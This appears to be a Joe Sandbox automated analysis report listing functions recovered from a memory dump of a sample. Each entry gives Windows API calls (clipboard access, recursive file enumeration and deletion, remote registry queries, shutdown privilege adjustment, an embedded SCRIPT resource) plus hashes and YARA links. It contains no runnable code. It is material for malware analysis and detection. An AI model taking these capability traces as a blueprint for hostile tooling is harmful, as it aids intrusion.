GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E16A1
HeapFree.KERNEL32(00000000), ref: 002E16A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E16B1
HeapFree.KERNEL32(00000000), ref: 002E16B8
GetProcessHeap.KERNEL32(00000000,?), ref: 002E16C4
HeapFree.KERNEL32(00000000), ref: 002E16CB

Part of subcall function 002E1ADF: GetProcessHeap.KERNEL32(00000008,002E14FD,?,00000000,?,002E14FD,?), ref: 002E1AED
Part of subcall function 002E1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002E14FD,?), ref: 002E1AF4
Part of subcall function 002E1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002E14FD,?), ref: 002E1B03

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 8a0a4515a73ddeb0dbfd389d3cd2a102ee498381a1d75106ffe6e0aede7b024f
Instruction ID: 3062b9e9e757cacc14d8aff376a9ce0ccde7b709141b11e5bd5d8f1f52f6b536
Opcode Fuzzy Hash: 8a0a4515a73ddeb0dbfd389d3cd2a102ee498381a1d75106ffe6e0aede7b024f
Instruction Fuzzy Hash: 31716EB295024AABDF11DFA6DC44FEEBBBCBF09340F488525E915A7190D7309925CB60

Function 002FF55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0031DCD0), ref: 002FF586
IsClipboardFormatAvailable.USER32(0000000D), ref: 002FF594
GetClipboardData.USER32(0000000D), ref: 002FF5A0
CloseClipboard.USER32 ref: 002FF5AC
GlobalLock.KERNEL32(00000000), ref: 002FF5E4
CloseClipboard.USER32 ref: 002FF5EE
GlobalUnlock.KERNEL32(00000000), ref: 002FF619
IsClipboardFormatAvailable.USER32(00000001), ref: 002FF626
GetClipboardData.USER32(00000001), ref: 002FF62E
GlobalLock.KERNEL32(00000000), ref: 002FF63F
GlobalUnlock.KERNEL32(00000000), ref: 002FF67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 002FF695
GetClipboardData.USER32(0000000F), ref: 002FF6A1
GlobalLock.KERNEL32(00000000), ref: 002FF6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 002FF6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 002FF6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 002FF72F
GlobalUnlock.KERNEL32(00000000), ref: 002FF750
CountClipboardFormats.USER32 ref: 002FF771
CloseClipboard.USER32 ref: 002FF7B6

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 21174332e2236fcd1b8762ca4e34a970fef3811947dc619ce7b81b017827b810
Instruction ID: 2b7f559a9bede5cc77f51e127dad46931f1c8b714436a2d8a663f079c43078cb
Opcode Fuzzy Hash: 21174332e2236fcd1b8762ca4e34a970fef3811947dc619ce7b81b017827b810
Instruction Fuzzy Hash: 7E61F035210206AFD301EF20DC88F7AF7A8AF89744F54846CF956872A2DB71D955CB62

Function 002F73D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002F7403
FindClose.KERNEL32(00000000), ref: 002F7457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002F7493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002F74BA

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 002F74F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 002F7524

Strings

%02d, xrefs: 002F7645, 002F764F, 002F769F, 002F76EF, 002F773F, 002F778F
%4d%02d%02d%02d%02d%02d, xrefs: 002F75AF
%4d, xrefs: 002F75F6
%4d%02d%02d%02d%02d%02d%03d, xrefs: 002F7577
%03d, xrefs: 002F77E7

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 8d0740392f37431e9049bb4cea17ec6c3cfbca0eb778d14a01f160d8fb341e17
Instruction ID: be82bf85625c3b928ff6b7c377fc3230a6f02df9788f5490253f5b0e7718717c
Opcode Fuzzy Hash: 8d0740392f37431e9049bb4cea17ec6c3cfbca0eb778d14a01f160d8fb341e17
Instruction Fuzzy Hash: 50D17E76518344AEC700EF64C881EBBB7ECAF88704F44492DF585C7292EB74DA54CBA2

Function 002FA087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 002FA0A8
GetFileAttributesW.KERNEL32(?), ref: 002FA0E6
SetFileAttributesW.KERNEL32(?,?), ref: 002FA100
FindNextFileW.KERNEL32(00000000,?), ref: 002FA118
FindClose.KERNEL32(00000000), ref: 002FA123
FindFirstFileW.KERNEL32(*.*,?), ref: 002FA13F
SetCurrentDirectoryW.KERNEL32(?), ref: 002FA18F
SetCurrentDirectoryW.KERNEL32(00347B94), ref: 002FA1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 002FA1B7
FindClose.KERNEL32(00000000), ref: 002FA1C4
FindClose.KERNEL32(00000000), ref: 002FA1D4

Strings

*.*, xrefs: 002FA13A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: c1580550ae927bef9e81a475e4031e0d820342a74438566fe24643c9486b42d1
Instruction ID: 8237be3aa02f3824fccb5fbac9734554d32703ca4b88eda552a930fcc0970380
Opcode Fuzzy Hash: c1580550ae927bef9e81a475e4031e0d820342a74438566fe24643c9486b42d1
Instruction Fuzzy Hash: A63117B151021E6BDB11AFB4EC49AEFB7AC9F0A3A0F004465FA1DD2090EB74DE55CE61

Function 002F4763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002F4785
_wcslen.LIBCMT ref: 002F47B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 002F47E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002F4803
RemoveDirectoryW.KERNEL32(?), ref: 002F4813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002F489A
CloseHandle.KERNEL32(00000000), ref: 002F48A5
CloseHandle.KERNEL32(00000000), ref: 002F48B0

Strings

\, xrefs: 002F47BC
:, xrefs: 002F47C7
\??\%s, xrefs: 002F47A0

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: c4b6dc9dd73a16d12439057bc8fc5a3803edb19b37f7684348752df7be07fc86
Instruction ID: 8e08f45ddf0ba6ae5f9b2e1edfc6ee031b500c3b3e168df962bd9b85ea213000
Opcode Fuzzy Hash: c4b6dc9dd73a16d12439057bc8fc5a3803edb19b37f7684348752df7be07fc86
Instruction Fuzzy Hash: FF31E87151014EABDB21AFA0DC49FEB77BCEF89780F1041B6F619D2060EBB097548B24

Function 002FA1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 002FA203
FindNextFileW.KERNEL32(00000000,?), ref: 002FA25E
FindClose.KERNEL32(00000000), ref: 002FA269
FindFirstFileW.KERNEL32(*.*,?), ref: 002FA285
SetCurrentDirectoryW.KERNEL32(?), ref: 002FA2D5
SetCurrentDirectoryW.KERNEL32(00347B94), ref: 002FA2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 002FA2FD
FindClose.KERNEL32(00000000), ref: 002FA30A
FindClose.KERNEL32(00000000), ref: 002FA31A

Part of subcall function 002EE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002EE3B4

Strings

*.*, xrefs: 002FA280

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 8a001c3209e8e856797d2776fd70c15ea576b93d036bd02acc2198023c6aa7b2
Instruction ID: de3fa13a65719fb6df142abbb8595a6635949db57b4c355a7b3e3da7723199dc
Opcode Fuzzy Hash: 8a001c3209e8e856797d2776fd70c15ea576b93d036bd02acc2198023c6aa7b2
Instruction Fuzzy Hash: A8312AB160021E6FCB119FA4DC09AEEB7AC9F0A364F1040A1F914A3090DB71DE558F51

Function 0030C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0030D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0030C10E,?,?), ref: 0030D415
Part of subcall function 0030D3F8: _wcslen.LIBCMT ref: 0030D451
Part of subcall function 0030D3F8: _wcslen.LIBCMT ref: 0030D4C8
Part of subcall function 0030D3F8: _wcslen.LIBCMT ref: 0030D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030C99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0030CA09
RegCloseKey.ADVAPI32(00000000), ref: 0030CA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0030CA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0030CB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0030CBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0030CC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0030CC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0030CD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0030CDE2
RegCloseKey.ADVAPI32(00000000), ref: 0030CDEF

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 8307447ce71673052f827a9e1a111bfdc5f7fcdaa8a843e8f9576cd4b1bf1d57
Instruction ID: c0d47db875f2152bd2a8f3ca704dbbe49caac19e2de508d96ffee1fd46d2d4af
Opcode Fuzzy Hash: 8307447ce71673052f827a9e1a111bfdc5f7fcdaa8a843e8f9576cd4b1bf1d57
Instruction Fuzzy Hash: 2B027F74615200AFD715DF28C8A5E2ABBE5EF49304F19C59DF84ACB2A2CB31EC42CB51

Function 002ED921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00285851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002855D1,?,?,002C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00285871

Part of subcall function 002EEAB0: GetFileAttributesW.KERNEL32(?,002ED840), ref: 002EEAB1

FindFirstFileW.KERNEL32(?,?), ref: 002ED9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 002EDA88
MoveFileW.KERNEL32(?,?), ref: 002EDA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 002EDAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 002EDAE2

Part of subcall function 002EDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,002EDAC7,?,?), ref: 002EDB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 002EDAFE
FindClose.KERNEL32(00000000), ref: 002EDB0F

Strings

\*.*, xrefs: 002ED978, 002ED981, 002ED996

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 9b45cdaa6e47e1504ef94eb3e9bf9fe23697772e78092bda556d6feb7d08a4cf
Instruction ID: 714c4f183a5b55429ddcbf48734fe49921f36768149bb89fe15903cbd2c3efc6
Opcode Fuzzy Hash: 9b45cdaa6e47e1504ef94eb3e9bf9fe23697772e78092bda556d6feb7d08a4cf
Instruction Fuzzy Hash: AC615E3585118DAECF02FFA1D9529EDB7B9AF15304F6040A9E40177196EB315F19CF60

Function 002FF7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 002FF7EE
EmptyClipboard.USER32 ref: 002FF7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 002FF809
CloseClipboard.USER32 ref: 002FF900

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 4a9f8d244a9b7b7944ebf43ce37ec7f9ec70b2576febe8f95e2e312bc05f3b41
Instruction ID: cd8b21a29c64740a79f14d806e06e1ce774c3eab33a7fb34af499219d0e82881
Opcode Fuzzy Hash: 4a9f8d244a9b7b7944ebf43ce37ec7f9ec70b2576febe8f95e2e312bc05f3b41
Instruction Fuzzy Hash: 8041D034610612AFD311DF14D988F65BBE8FF09398F14C4A8E8298B7A2C775EC52CB90

Function 002EF20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 002E2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002E205A
Part of subcall function 002E2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002E2087
Part of subcall function 002E2010: GetLastError.KERNEL32 ref: 002E2097

ExitWindowsEx.USER32(?,00000000), ref: 002EF249

Strings

, xrefs: 002EF273
@, xrefs: 002EF23C
SeShutdownPrivilege, xrefs: 002EF219
, xrefs: 002EF237

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 9e97fc64fdd427f6c3ef98262b31590e8888a7e87d9c41a09bc913b72327bffe
Instruction ID: 58f6d98b8287865feb977d3fa8df5070d29fa34f4c33324912448b360fb33227
Opcode Fuzzy Hash: 9e97fc64fdd427f6c3ef98262b31590e8888a7e87d9c41a09bc913b72327bffe
Instruction Fuzzy Hash: 4F01497A6B02A16BEB5466B99D8AFFF736C9B0D340F904430FE03E21D1D7704D2095A0

Function 002822AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 0028233E
GetSysColor.USER32(0000000F), ref: 00282421
SetBkColor.GDI32(?,00000000), ref: 00282434

Strings

(5, xrefs: 0028240A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Color$Proc
String ID: (5
API String ID: 929743424-4024434197
Opcode ID: 4ce24d43a010d172ab4a00a5764266673692ed3663cd53a02bb90d9ff9d16555
Instruction ID: c2a48946a655c7ab1bed4b40496931d10ba13b8a463ffbd56b08b178279f40f5
Opcode Fuzzy Hash: 4ce24d43a010d172ab4a00a5764266673692ed3663cd53a02bb90d9ff9d16555
Instruction Fuzzy Hash: A88129F8136401FDE22EBE384C68FBF255EEB46300F158649F102D95D5CA999E7A8372

Function 002F3A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002C56C2,?,?,00000000,00000000), ref: 002F3A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002C56C2,?,?,00000000,00000000), ref: 002F3A35
LoadResource.KERNEL32(?,00000000,?,?,002C56C2,?,?,00000000,00000000,?,?,?,?,?,?,002866CE), ref: 002F3A45
SizeofResource.KERNEL32(?,00000000,?,?,002C56C2,?,?,00000000,00000000,?,?,?,?,?,?,002866CE), ref: 002F3A56
LockResource.KERNEL32(002C56C2,?,?,002C56C2,?,?,00000000,00000000,?,?,?,?,?,?,002866CE,?), ref: 002F3A65

Strings

SCRIPT, xrefs: 002F3A2B

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 49255a58e242a69677ce250c5b02d33d0865172258f851b6bc8e62e8eadb127c
Instruction ID: 9c2fdac2ff627e0b1edbf5d11cbdba382ebb1ad75a0bb72f67c9baf5ea874604
Opcode Fuzzy Hash: 49255a58e242a69677ce250c5b02d33d0865172258f851b6bc8e62e8eadb127c
Instruction Fuzzy Hash: 56117C70200705BFE7228F26DC48F67BBBDEBC9B40F14866CB52296250DB71E9018A70

Function 002E20AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002E1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002E1916
Part of subcall function 002E1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002E1922
Part of subcall function 002E1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002E1931
Part of subcall function 002E1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002E1938
Part of subcall function 002E1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002E194E

GetLengthSid.ADVAPI32(?,00000000,002E1C81), ref: 002E20FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002E2107
HeapAlloc.KERNEL32(00000000), ref: 002E210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 002E2127
GetProcessHeap.KERNEL32(00000000,00000000,002E1C81), ref: 002E213B
HeapFree.KERNEL32(00000000), ref: 002E2142

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 6a768443631f8f7ea888a03bb412552a5281e53622bcf072a6b3eb5cc5b87ab4
Instruction ID: 242cfa79317ee3d9aeec68cb48f950614c8b9b97b869937b3de151c2da748735
Opcode Fuzzy Hash: 6a768443631f8f7ea888a03bb412552a5281e53622bcf072a6b3eb5cc5b87ab4
Instruction Fuzzy Hash: 211100715A0205FFDF118F65CC08BEE7BBDEF49355F508028E9469B120C7359A18CB60

Function 002FA570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 002FA5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 002FA6D0

Part of subcall function 002F42B9: GetInputState.USER32 ref: 002F4310
Part of subcall function 002F42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F43AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 002FA5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 002FA6BA

Strings

*.*, xrefs: 002FA5A2

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 366143c1a614be05a9071285cb419979af059112ea97f5e0d0a6fd721190cf40
